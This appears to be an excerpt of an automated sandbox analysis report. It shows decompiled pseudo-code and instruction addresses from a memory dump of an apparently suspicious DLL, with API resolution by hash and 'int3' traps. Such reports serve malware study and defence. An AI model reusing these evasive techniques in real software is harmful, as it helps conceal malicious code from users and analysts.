							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v100 = 0x97abe05f;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2316, E6EA19650( &_a2316) + 0x10);
							E6EA19640( &_a2312, E6EA19650( &_a2312) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v108 = 0x82d274c4;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2308, E6EA19650( &_a2308) + 0x10);
							__eflags = E6EA19650( &_a2304) + 0xfffffff0;
							E6EA19640( &_a2304, E6EA19650( &_a2304) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("movups [eax], xmm0");
							E6EA21270(0x588ab3ea,  &_a2300);
							E6EA19640( &_a2300, 0x10);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x910], xmm0");
							E6EA19640( &_a2296, 0x20);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x918], xmm0");
							E6EA19640( &_a2292, 0x30);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x920], xmm0");
							E6EA19640( &_a2288, 0x40);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x928], xmm0");
							E6EA19640( &_a2284, 0x50);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x930], xmm0");
							E6EA19640( &_a2280, 0x60);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x938], xmm0");
							E6EA19640( &_a2276, 0x70);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x940], xmm0");
							E6EA19640( &_a2272, 0x80);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x948], xmm0");
							E6EA19640( &_a2268, 0x90);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x950], xmm0");
							E6EA19640( &_a2264, 0xa0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x958], xmm0");
							E6EA19640( &_a2260, 0xb0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x960], xmm0");
							E6EA19640( &_a2256, 0xc0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x968], xmm0");
							E6EA19640( &_a2252, 0xd0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x970], xmm0");
							E6EA19640( &_a2248, 0xe0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x978], xmm0");
							E6EA19640( &_a2244, 0xf0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x980], xmm0");
							E6EA19640( &_a2240, 0x100);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x988], xmm0");
							E6EA19640( &_a2236, 0);
							asm("movq xmm0, [eax+0x8]");
							asm("movdqu [esp+0x60], xmm0");
							E6EA00B70( &_a2280, 0, 0x30);
							_t727 = _t730 + 0xc;
							asm("movd xmm4, edi");
							asm("cdq");
							asm("pxor xmm0, xmm0");
							asm("movdqu [eax-0x950], xmm0");
							 *(_t727 + 0x50) = _t702;
							asm("movd xmm1, edx");
							asm("cdq");
							asm("movd xmm3, eax");
							asm("punpckldq xmm4, xmm1");
							asm("movd xmm2, edx");
							asm("punpckldq xmm3, xmm2");
							asm("movdqu [esp+0x70], xmm3");
							asm("movdqu [eax-0x960], xmm4");
							 *(_t727 + 0x54) = _t523;
							do {
								asm("movdqu xmm0, [esp+0x60]");
								asm("movq [esp], xmm0");
								asm("pxor xmm5, xmm5");
								_v36 = 6;
								asm("movdqu xmm1, [esp+0x80]");
								asm("movq [esp+0xc], xmm1");
								asm("movdqu xmm2, [esp+0x90]");
								asm("movq [esp+0x14], xmm2");
								asm("movq [esp+0x1c], xmm5");
								asm("movdqu xmm3, [esp+0x70]");
								asm("movq xmm4, [0x6ea293d8]");
								asm("movq [esp+0x24], xmm3");
								asm("movq [esp+0x2c], xmm4");
								asm("movq [esp+0x34], xmm5");
								_t527 = E6EA204B0(_t702);
								_t702 =  *(_t727 + 0x9e0);
								_t715 = _a2488;
								asm("movq xmm0, [esp+0x9f8]");
								__eflags =  ~_a2492 + _t702 |  ~( *(_t727 + 0x9ec)) + _t715;
								asm("movdqu xmm1, [esp+0x90]");
								asm("paddq xmm1, xmm0");
								asm("movdqu [esp+0x90], xmm1");
								if(( ~_a2492 + _t702 |  ~( *(_t727 + 0x9ec)) + _t715) != 0) {
									goto L21;
								} else {
									_push(0x400);
									E6EA19350( &_a2468);
									 *(_t727 + 0x5c) = E6EA19640( &_a2464, 0);
									 *((intOrPtr*)(_t727 + 0x58)) = E6EA19640(_t727 + 0x9d4, 0);
									E6EA19650(_t727 + 0x9d0);
									asm("movdqu xmm0, [esp+0x60]");
									asm("movd xmm6, ecx");
									asm("movq [esp], xmm0");
									 *((intOrPtr*)(_t727 + 8)) = 6;
									asm("pxor xmm7, xmm7");
									asm("movdqu xmm1, [esp+0x80]");
									asm("movq xmm2, [0x6ea293d0]");
									asm("movq [esp+0xc], xmm1");
									_v36 = _t702;
									 *((intOrPtr*)(_t727 + 0x18)) = _t715;
									asm("movq [esp+0x1c], xmm2");
									asm("cdq");
									asm("movd xmm4, eax");
									asm("movd xmm3, edx");
									asm("cdq");
									asm("punpckldq xmm4, xmm3");
									asm("movq [esp+0x24], xmm4");
									asm("movd xmm5, edx");
									asm("punpckldq xmm6, xmm5");
									asm("movq [esp+0x2c], xmm6");
									asm("movq [esp+0x34], xmm7");
									_t496 = E6EA204B0(_t702);
									__eflags = _t496;
									if(_t496 != 0) {
										L40:
										L6EA19510( &_a2464);
										_t702 = 0xe5ab9b45;
									} else {
										__eflags =  *( *(_t727 + 0x5c)) & 0x0000ffff;
										if(__eflags == 0) {
											goto L40;
										} else {
											E6EA083B0(_t727 + 0xa28);
											E6EA12E60(_t727 + 0xa30, __eflags,  &_a2560, 0x5c);
											E6EA11020( &_a2560,  &_a2560);
											_t505 = E6EA1D620( *((intOrPtr*)(_t727 + 0xa38)), E6EA16040( *((intOrPtr*)(_t727 + 0xa38)), 0x7fffffff));
											E6EA10B10(_t727 + 0xa38);
											E6EA10B10( &_a2560);
											E6EA10B10( &_a2540);
											L6EA19510(_t727 + 0x9d0);
											_t702 = _t505 ^ 0x38ba5c7b;
											__eflags = _t702;
										}
									}
									__eflags = _t702 - 0xa1310f65;
									if(__eflags == 0) {
										_t702 =  *(_t727 + 0x50);
										_t523 =  *(_t727 + 0x54);
										_t716 = _a2480;
										 *((intOrPtr*)(_t727 + 0x58)) =  *((intOrPtr*)(_t727 + 0x9e4));
									} else {
										goto L21;
									}
								}
								L23:
								E6E9FDE60(_t727 + 0x9c8, _t702, __eflags, _t716,  *((intOrPtr*)(_t727 + 0x58)));
								L6EA1A110(_t727 + 0x9b0);
								 *((intOrPtr*)(_t727 + 0x40)) = 0xe2d27ff4;
								asm("pxor xmm0, xmm0");
								asm("movq [esp+0x48], xmm0");
								E6EA19670(_t727 + 0x9b4, E6EA19650(_t727 + 0x9b0) + 0x10);
								E6EA19640( &_a2424, E6EA19650( &_a2424) + 0xfffffff0);
								asm("movups xmm0, [esp+0x40]");
								asm("pxor xmm1, xmm1");
								asm("movups [eax], xmm0");
								_a4 = 0x69121530;
								asm("movq [esp+0x48], xmm1");
								E6EA19670(_t727 + 0x9b4, E6EA19650(_t727 + 0x9b0) + 0x10);
								E6EA19640( &_a2416, E6EA19650( &_a2416) + 0xfffffff0);
								asm("movups xmm0, [esp+0x40]");
								asm("pxor xmm1, xmm1");
								asm("movups [eax], xmm0");
								_v4 = 0x77be1f6;
								asm("movq [esp+0x48], xmm1");
								E6EA19670( &_a2412, E6EA19650( &_a2412) + 0x10);
								E6EA19640( &_a2408, E6EA19650( &_a2408) + 0xfffffff0);
								asm("movups xmm0, [esp+0x40]");
								asm("pxor xmm1, xmm1");
								asm("movups [eax], xmm0");
								_v12 = 0xf1c64384;
								asm("movq [esp+0x48], xmm1");
								E6EA19670( &_a2404, E6EA19650( &_a2404) + 0x10);
								__eflags = E6EA19650( &_a2400) + 0xfffffff0;
								E6EA19640( &_a2400, E6EA19650( &_a2400) + 0xfffffff0);
								asm("movups xmm0, [esp+0x40]");
								_push( &_a2396);
								_push(_a4);
								_push(_t716);
								asm("movups [edx], xmm0");
								E6E9FE780( &_a2412, _t716, __eflags);
								E6EA19640( &_a2384, 0);
								asm("movq xmm0, [eax+0x8]");
								asm("movq [esp+0x998], xmm0");
								E6EA19640( &_a2380, 0x10);
								asm("movq xmm0, [eax+0x8]");
								asm("movq [esp+0x9a0], xmm0");
								E6EA19640( &_a2376, 0x20);
								asm("movq xmm0, [eax+0x8]");
								asm("movq [esp+0x990], xmm0");
								E6EA19640( &_a2372, 0x30);
								asm("movq xmm0, [eax+0x8]");
								asm("movq [ecx-0x18], xmm0");
								L6EA19510( &_a2384);
								L6EA19510( &_a2368);
								asm("cdq");
								asm("movd xmm1, eax");
								asm("movd xmm0, edx");
								asm("cdq");
								asm("movd xmm3, eax");
								asm("punpckldq xmm1, xmm0");
								asm("movq [esp+0x900], xmm1");
								asm("movd xmm2, edx");
								asm("punpckldq xmm3, xmm2");
								asm("movq [esp+0x908], xmm3");
								E6EA19710(_t727 + 0xa68, _t727 + 0x4c4, 0x4f0);
								_t689 = _t727 + 0xa58;
								_t304 = L6E9FACD0(_t523, _t727 + 0xa58, __eflags, 0x5c8, _t727 + 0xa60);
								goto L24;
								L21:
								__eflags = _t527;
							} while (_t527 == 0);
							_t716 = 0;
							__eflags = 0;
							_t702 =  *(_t727 + 0x50);
							_t523 =  *(_t727 + 0x54);
							 *((intOrPtr*)(_t727 + 0x58)) = 0;
							goto L23;
						}
						L24:
						_t712 = _t304;
						__eflags = _t712;
						if(_t712 != 0) {
							__eflags = _t523;
							_push(0);
							_t525 =  !=  ? _t523 + 0xc : _t523;
							_push( !=  ? _t523 + 0xc : _t523);
							_t321 = E6EA21A80(_t689, _t523, _t727 + 0xa1c, 0x2710);
							_t727 = _t727 + 0x10;
							_t523 = 0;
							__eflags = _t321;
							_t712 =  !=  ? 0 : _t712;
						}
						__eflags =  *(_t727 + 0xa98);
						if( *(_t727 + 0xa98) == 0) {
							L31:
							__eflags =  *(_t727 + 0xa9c);
							if( *(_t727 + 0xa9c) == 0) {
								L36:
								L6EA22530(_t523, _t727 + 0xa10, _t689, _t702, _t712);
								L6EA19510(_t727 + 0xa60);
								L6EA19510( &_a2592);
								L6EA19510( &_a2576);
								E6EA21F40(_t727 + 0xaa0, _t689, _t712);
								return _t712;
							} else {
								_t689 = L6EA015C0(0x588ab3ea, 0xea812079);
								__eflags = _t689;
								if(_t689 != 0) {
									_t523 = 0;
									__eflags = 0;
									 *_t689(_t702,  *((intOrPtr*)(_t727 + 0xab0)), 0xffffffff,  &_a2648, 0, 0, 1);
								}
								_t313 = L6EA015C0(0x588ab3ea, 0x35b39b2b);
								__eflags = _t313;
								if(_t313 == 0) {
									goto L36;
								} else {
									_push(_a2648);
									asm("int3");
									return _t313;
								}
							}
						} else {
							_t689 = L6EA015C0(0x588ab3ea, 0xea812079);
							__eflags = _t689;
							if(_t689 != 0) {
								_t523 = 0;
								__eflags = 0;
								 *_t689(_t702,  *((intOrPtr*)(_t727 + 0xaac)), 0xffffffff,  &_a2648, 0, 0, 1);
							}
							_t317 = L6EA015C0(0x588ab3ea, 0x35b39b2b);
							__eflags = _t317;
							if(_t317 == 0) {
								goto L31;
							} else {
								_push(_a2648);
								asm("int3");
								return _t317;
							}
						}
					} else {
						_t687 =  &_a1184;
						 *_t531(0xffffffff,  *((intOrPtr*)(_t725 + 0xa24)), _t702,  &_a1184, 0, 0, 2);
						__eflags = 0;
						if(0 == 0) {
							goto L12;
						} else {
							__eflags =  *((char*)(_t725 + 0xa7c));
							if( *((char*)(_t725 + 0xa7c)) != 0) {
								E6EA1BE30(_t725 + 0xa78, _t707);
							}
							__eflags = _a2656;
							if(_a2656 == 0) {
								goto L38;
							} else {
								_t519 = L6EA015C0(0x588ab3ea, 0xea812079);
								__eflags = _t519;
								if(_t519 == 0) {
									_t520 = L6EA015C0(0x588ab3ea, 0x35b39b2b);
									__eflags = _t520;
									if(_t520 == 0) {
										goto L38;
									} else {
										_push( *((intOrPtr*)(_t725 + 0x40)));
										asm("int3");
										return _t520;
									}
								} else {
									__eflags = 0;
									_push(1);
									_push(0);
									_push(0);
									_push(_t725 + 0x40);
									_push(0xffffffff);
									_push(_a2656);
									_push(_t702);
									asm("int3");
									return _t519;
								}
							}
						}
					}
				} else {
					if(_a2656 != 0) {
						E6EA1BE30( &_a2652, _t707);
					}
					L38:
					L6EA22530(_t523, _t725 + 0xa10, _t687, _t702, _t707);
					L6EA19510(_t725 + 0xa60);
					L6EA19510(_t725 + 0xa50);
					L6EA19510( &_a2568);
					E6EA21F40(_t725 + 0xaa0, _t687, _t707);
					return 0;
				}
			}

0x6e9f1784
0x6e9f1786
0x6e9f178d
0x6e9f178f
0x6e9f1790
0x6e9f1791
0x6e9f1792
0x6e9f1793
0x6e9f179a
0x6e9f179c
0x6e9f17a0
0x6e9f17bc
0x6e9f17d2
0x6e9f17d4
0x6e9f17d6
0x6e9f186a
0x6e9f1871
0x6e9f1878
0x6e9f1880
0x6e9f1889
0x6e9f1889
0x6e9f1895
0x6e9f18a2
0x6e9f18a4
0x6e9f18a7
0x6e9f18b0
0x6e9f18c3
0x6e9f18cf
0x6e9f18e8
0x6e9f18fb
0x6e9f1912
0x6e9f1917
0x6e9f191c
0x6e9f1921
0x6e9f1924
0x6e9f27e7
0x6e9f27ec
0x6e9f27f6
0x6e9f27fd
0x6e9f2817
0x6e9f282d
0x6e9f2843
0x6e9f2859
0x6e9f286f
0x6e9f2885
0x6e9f289b
0x6e9f28b1
0x6e9f28c7
0x6e9f28dd
0x6e9f28f3
0x6e9f2909
0x6e9f291f
0x6e9f2935
0x6e9f294b
0x6e9f2961
0x6e9f2977
0x6e9f298d
0x6e9f29a3
0x6e9f29b4
0x6e9f29c0
0x6e9f29ce
0x6e9f29d5
0x6e9f29ed
0x6e9f29fb
0x6e9f29fc
0x6e9f2a01
0x6e9f2a08
0x6e9f192a
0x6e9f1939
0x6e9f193e
0x6e9f1948
0x6e9f1956
0x6e9f1960
0x6e9f1962
0x6e9f1967
0x6e9f1976
0x6e9f197a
0x6e9f1990
0x6e9f19ac
0x6e9f19b1
0x6e9f19bd
0x6e9f19c1
0x6e9f19c4
0x6e9f19cc
0x6e9f19e2
0x6e9f19fe
0x6e9f1a03
0x6e9f1a0f
0x6e9f1a13
0x6e9f1a16
0x6e9f1a1e
0x6e9f1a34
0x6e9f1a50
0x6e9f1a55
0x6e9f1a61
0x6e9f1a65
0x6e9f1a68
0x6e9f1a70
0x6e9f1a86
0x6e9f1aa2
0x6e9f1aa7
0x6e9f1ab3
0x6e9f1ab7
0x6e9f1aba
0x6e9f1ac2
0x6e9f1ad8
0x6e9f1af4
0x6e9f1af9
0x6e9f1b05
0x6e9f1b09
0x6e9f1b0c
0x6e9f1b14
0x6e9f1b2a
0x6e9f1b46
0x6e9f1b4b
0x6e9f1b57
0x6e9f1b5b
0x6e9f1b5e
0x6e9f1b66
0x6e9f1b7c
0x6e9f1b98
0x6e9f1b9d
0x6e9f1ba9
0x6e9f1bad
0x6e9f1bb0
0x6e9f1bb8
0x6e9f1bce
0x6e9f1bea
0x6e9f1bef
0x6e9f1bfb
0x6e9f1bff
0x6e9f1c02
0x6e9f1c0a
0x6e9f1c20
0x6e9f1c3c
0x6e9f1c41
0x6e9f1c4d
0x6e9f1c51
0x6e9f1c54
0x6e9f1c5c
0x6e9f1c72
0x6e9f1c8e
0x6e9f1c93
0x6e9f1c9f
0x6e9f1ca3
0x6e9f1ca6
0x6e9f1cae
0x6e9f1cc4
0x6e9f1ce0
0x6e9f1ce5
0x6e9f1cf1
0x6e9f1cf5
0x6e9f1cf8
0x6e9f1d00
0x6e9f1d16
0x6e9f1d32
0x6e9f1d37
0x6e9f1d43
0x6e9f1d47
0x6e9f1d4a
0x6e9f1d52
0x6e9f1d68
0x6e9f1d84
0x6e9f1d89
0x6e9f1d95
0x6e9f1d99
0x6e9f1d9c
0x6e9f1da4
0x6e9f1dba
0x6e9f1dd6
0x6e9f1ddb
0x6e9f1de7
0x6e9f1deb
0x6e9f1dee
0x6e9f1df6
0x6e9f1e0c
0x6e9f1e28
0x6e9f1e2d
0x6e9f1e39
0x6e9f1e3d
0x6e9f1e40
0x6e9f1e48
0x6e9f1e5e
0x6e9f1e7a
0x6e9f1e7f
0x6e9f1e8b
0x6e9f1e8f
0x6e9f1e92
0x6e9f1e9a
0x6e9f1eb0
0x6e9f1ec1
0x6e9f1ecc
0x6e9f1ed1
0x6e9f1ee2
0x6e9f1ee5
0x6e9f1ef3
0x6e9f1ef8
0x6e9f1efd
0x6e9f1f0f
0x6e9f1f14
0x6e9f1f19
0x6e9f1f2b
0x6e9f1f30
0x6e9f1f35
0x6e9f1f47
0x6e9f1f4c
0x6e9f1f51
0x6e9f1f63
0x6e9f1f68
0x6e9f1f6d
0x6e9f1f7f
0x6e9f1f84
0x6e9f1f89
0x6e9f1f9b
0x6e9f1fa0
0x6e9f1fa5
0x6e9f1fba
0x6e9f1fbf
0x6e9f1fc4
0x6e9f1fd9
0x6e9f1fde
0x6e9f1fe3
0x6e9f1ff8
0x6e9f1ffd
0x6e9f2002
0x6e9f2017
0x6e9f201c
0x6e9f2021
0x6e9f2036
0x6e9f203b
0x6e9f2040
0x6e9f2055
0x6e9f205a
0x6e9f205f
0x6e9f2074
0x6e9f2079
0x6e9f207e
0x6e9f2093
0x6e9f2098
0x6e9f209d
0x6e9f20b2
0x6e9f20b7
0x6e9f20bc
0x6e9f20ce
0x6e9f20d3
0x6e9f20df
0x6e9f20ea
0x6e9f20ef
0x6e9f20f4
0x6e9f20f8
0x6e9f20f9
0x6e9f2104
0x6e9f210c
0x6e9f2110
0x6e9f2114
0x6e9f2115
0x6e9f2119
0x6e9f211d
0x6e9f2121
0x6e9f2125
0x6e9f212b
0x6e9f2133
0x6e9f2137
0x6e9f2137
0x6e9f213d
0x6e9f2142
0x6e9f2146
0x6e9f214e
0x6e9f2157
0x6e9f215d
0x6e9f2166
0x6e9f216c
0x6e9f2172
0x6e9f2178
0x6e9f2180
0x6e9f2186
0x6e9f218c
0x6e9f2197
0x6e9f21ab
0x6e9f21b4
0x6e9f21bd
0x6e9f21c6
0x6e9f21c8
0x6e9f21d1
0x6e9f21d5
0x6e9f21de
0x00000000
0x6e9f21e4
0x6e9f21e4
0x6e9f21f0
0x6e9f2203
0x6e9f2215
0x6e9f2220
0x6e9f2227
0x6e9f222d
0x6e9f2231
0x6e9f2236
0x6e9f223e
0x6e9f2242
0x6e9f224b
0x6e9f2253
0x6e9f2259
0x6e9f225d
0x6e9f2261
0x6e9f226b
0x6e9f226c
0x6e9f2272
0x6e9f2276
0x6e9f2277
0x6e9f227b
0x6e9f2281
0x6e9f2285
0x6e9f2289
0x6e9f228f
0x6e9f2295
0x6e9f229a
0x6e9f229c
0x6e9f27c5
0x6e9f27cc
0x6e9f27d1
0x6e9f22a2
0x6e9f22a9
0x6e9f22ab
0x00000000
0x6e9f22b1
0x6e9f22bb
0x6e9f22d1
0x6e9f22e0
0x6e9f22fc
0x6e9f230a
0x6e9f2311
0x6e9f231d
0x6e9f2329
0x6e9f232e
0x6e9f232e
0x6e9f232e
0x6e9f22ab
0x6e9f2334
0x6e9f233a
0x6e9f27ad
0x6e9f27b1
0x6e9f27b5
0x6e9f27bc
0x00000000
0x00000000
0x00000000
0x6e9f233a
0x6e9f2356
0x6e9f2364
0x6e9f2370
0x6e9f2375
0x6e9f2384
0x6e9f2388
0x6e9f239e
0x6e9f23ba
0x6e9f23bf
0x6e9f23cb
0x6e9f23cf
0x6e9f23d2
0x6e9f23da
0x6e9f23f0
0x6e9f240c
0x6e9f2411
0x6e9f241d
0x6e9f2421
0x6e9f2424
0x6e9f242c
0x6e9f2442
0x6e9f245e
0x6e9f2463
0x6e9f246f
0x6e9f2473
0x6e9f2476
0x6e9f247e
0x6e9f2494
0x6e9f24a5
0x6e9f24b0
0x6e9f24b7
0x6e9f24c3
0x6e9f24c4
0x6e9f24c8
0x6e9f24c9
0x6e9f24d5
0x6e9f24e3
0x6e9f24e8
0x6e9f24ed
0x6e9f24ff
0x6e9f2504
0x6e9f2509
0x6e9f251b
0x6e9f2520
0x6e9f2525
0x6e9f2537
0x6e9f253c
0x6e9f2548
0x6e9f254d
0x6e9f2559
0x6e9f2565
0x6e9f2566
0x6e9f2571
0x6e9f2575
0x6e9f2576
0x6e9f257a
0x6e9f257e
0x6e9f2587
0x6e9f258b
0x6e9f258f
0x6e9f25ac
0x6e9f25c0
0x6e9f25c7
0x00000000
0x6e9f2340
0x6e9f2340
0x6e9f2340
0x6e9f2348
0x6e9f2348
0x6e9f234a
0x6e9f234e
0x6e9f2352
0x00000000
0x6e9f2352
0x6e9f25cc
0x6e9f25cc
0x6e9f25d0
0x6e9f25d2
0x6e9f25d4
0x6e9f25d9
0x6e9f25db
0x6e9f25de
0x6e9f25ec
0x6e9f25f1
0x6e9f25f4
0x6e9f25f6
0x6e9f25f8
0x6e9f25f8
0x6e9f25fb
0x6e9f2603
0x6e9f2650
0x6e9f2650
0x6e9f2658
0x6e9f26a5
0x6e9f26ac
0x6e9f26b8
0x6e9f26c4
0x6e9f26d0
0x6e9f26dc
0x6e9f26ef
0x6e9f265a
0x6e9f2669
0x6e9f266b
0x6e9f266d
0x6e9f266f
0x6e9f266f
0x6e9f2687
0x6e9f2687
0x6e9f2693
0x6e9f2698
0x6e9f269a
0x00000000
0x6e9f269c
0x6e9f269c
0x6e9f26a3
0x6e9f26a4
0x6e9f26a4
0x6e9f269a
0x6e9f2605
0x6e9f2614
0x6e9f2616
0x6e9f2618
0x6e9f261a
0x6e9f261a
0x6e9f2632
0x6e9f2632
0x6e9f263e
0x6e9f2643
0x6e9f2645
0x00000000
0x6e9f2647
0x6e9f2647
0x6e9f264e
0x6e9f264f
0x6e9f264f
0x6e9f2645
0x6e9f17dc
0x6e9f17de
0x6e9f17f4
0x6e9f17f6
0x6e9f17f8
0x00000000
0x6e9f17fa
0x6e9f17fa
0x6e9f1802
0x6e9f180b
0x6e9f180b
0x6e9f1810
0x6e9f1818
0x00000000
0x6e9f181e
0x6e9f1828
0x6e9f182d
0x6e9f182f
0x6e9f1852
0x6e9f1857
0x6e9f1859
0x00000000
0x6e9f185f
0x6e9f185f
0x6e9f1863
0x6e9f1864
0x6e9f1864
0x6e9f1831
0x6e9f1831
0x6e9f1837
0x6e9f1839
0x6e9f183a
0x6e9f183b
0x6e9f183c
0x6e9f183e
0x6e9f1845
0x6e9f1846
0x6e9f1847
0x6e9f1847
0x6e9f182f
0x6e9f1818
0x6e9f17f8
0x6e9f17a2
0x6e9f17aa
0x6e9f2756
0x6e9f2756
0x6e9f275b
0x6e9f2762
0x6e9f276e
0x6e9f277a
0x6e9f2786
0x6e9f2792
0x6e9f27a5
0x6e9f27a5

Strings

)8GV, xrefs: 6E9F1956

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: )8GV
API String ID: 0-3946227331
Opcode ID: d6f4f9e9e2e16ae61c90e51007ecc565be914cd186209e1dba470fd42361a002
Instruction ID: 124ee0006cd47705862149388c7c9f8b430ce42b74a6540b977d26fddeff6095
Opcode Fuzzy Hash: d6f4f9e9e2e16ae61c90e51007ecc565be914cd186209e1dba470fd42361a002
Instruction Fuzzy Hash: EB827F3191D7808AE325DFA4DB51BEFB3A8AFE2258F004F1DE19952192FF30A584C756

Uniqueness

Uniqueness Score: -1.00%

Function 6EA12E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EA12E60(signed int __ecx, void* __eflags, signed int _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t230;
				signed int _t231;
				signed int* _t237;
				char* _t238;
				void* _t245;
				signed int _t246;
				char _t249;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				char _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				void* _t286;
				void* _t288;
				signed int _t292;
				void* _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				char _t312;
				char _t313;
				char _t314;
				char _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t331;
				signed int _t332;
				signed int _t335;
				signed int _t336;
				void* _t337;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				char* _t347;
				signed int _t350;
				signed int _t352;
				void* _t355;
				signed int _t357;
				char _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t386;
				void* _t389;
				signed int _t390;
				char _t392;
				signed int _t395;
				signed int _t400;
				char _t402;
				char _t403;
				char _t404;
				signed int _t406;
				unsigned int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				signed int _t421;
				signed int _t422;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t450;
				signed int _t452;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t478;
				signed int _t482;
				void* _t485;

				_v56 = 0;
				_t449 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t406 = E6EA01030();
				_t485 = (_t482 & 0xfffffff0) - 0x34 + 4;
				_t230 = _v56;
				if(_t230 == 0) {
					 *_t406 = 0;
					L8:
					_t231 = _a8;
					_v52 = 0x40;
					_v56 = _t406;
					if(_t231 != 0) {
						__eflags = _t406;
						if(_t406 == 0) {
							_t310 = 0x40;
							_t283 = 0;
							L22:
							_t20 = _t283 + 2; // 0x80000001
							_t341 = _t20;
							__eflags = _t341 - 0x40;
							_t342 =  <=  ? 0x40 : _t341;
							__eflags = _t310 - _t342;
							if(_t310 < _t342) {
								_t411 = (_t342 >> 5 >> 0x1a) + _t342 >> 6;
								_t343 = _t342 & 0x8000003f;
								__eflags = _t343;
								if(_t343 < 0) {
									_t343 = (_t343 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t343;
								}
								__eflags = _t343;
								_t413 = _t411 + (0 | _t343 > 0x00000000) << 6;
								_push(_t413);
								_t311 = E6EA01030();
								_t485 = _t485 + 4;
								_t344 = _v56;
								__eflags = _t344;
								if(_t344 == 0) {
									 *_t311 = 0;
									goto L35;
								} else {
									__eflags = _t311;
									if(_t311 == 0) {
										L33:
										_push(1);
										_push(_t344);
										_v68 = _t311;
										E6EA010B0();
										_t311 = _v68;
										_t485 = _t485 + 8;
										L35:
										_v52 = _t413;
										_v56 = _t311;
										L36:
										 *((char*)(_t311 + _t283)) = _a8;
										_t237 =  &_v56;
										 *((char*)(_t283 +  *_t237 + 1)) = 0;
										L37:
										_t238 =  *_t237;
										_v28 = _t238;
										_t284 = _a4;
										if(_t238 == 0) {
											L39:
											_push(0x40);
											 *_t284 = 0;
											 *(_t284 + 4) = 0;
											_t450 = E6EA01030();
											_t485 = _t485 + 4;
											_t347 =  *_t284;
											if(_t347 == 0) {
												 *_t450 = 0;
												L61:
												 *_t284 = _t450;
												 *(_t284 + 4) = 0x40;
												L62:
												_push(1);
												_push(_v56);
												E6EA010B0();
												_v56 = 0;
												_v52 = 0;
												return _t284;
											}
											if(_t450 == 0) {
												L45:
												_push(1);
												_push(_t347);
												E6EA010B0();
												_t485 = _t485 + 8;
												goto L61;
											}
											_t312 =  *_t347;
											 *_t450 = _t312;
											if(_t312 == 0) {
												goto L45;
											}
											_t415 = 0;
											while(1) {
												_t415 = _t415 + 1;
												_t313 =  *((char*)(_t347 + _t415 * 2 - 1));
												 *((char*)(_t450 + _t415 * 2 - 1)) = _t313;
												if(_t313 == 0) {
													goto L45;
												}
												_t314 =  *((char*)(_t347 + _t415 * 2));
												 *((char*)(_t450 + _t415 * 2)) = _t314;
												if(_t314 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t315 =  *_t238;
										_v48 = _t315;
										if(_t315 != 0) {
											_t350 =  *_t449;
											_v60 = _t350;
											__eflags = _t350;
											if(_t350 == 0) {
												L53:
												_push(0x40);
												 *_t284 = 0;
												 *(_t284 + 4) = 0;
												_t450 = E6EA01030();
												_t485 = _t485 + 4;
												_t352 =  *_t284;
												__eflags = _t352;
												if(_t352 == 0) {
													 *_t450 = 0;
													goto L61;
												}
												__eflags = _t450;
												if(_t450 == 0) {
													L59:
													_push(1);
													_push(_t352);
													E6EA010B0();
													_t485 = _t485 + 8;
													goto L61;
												}
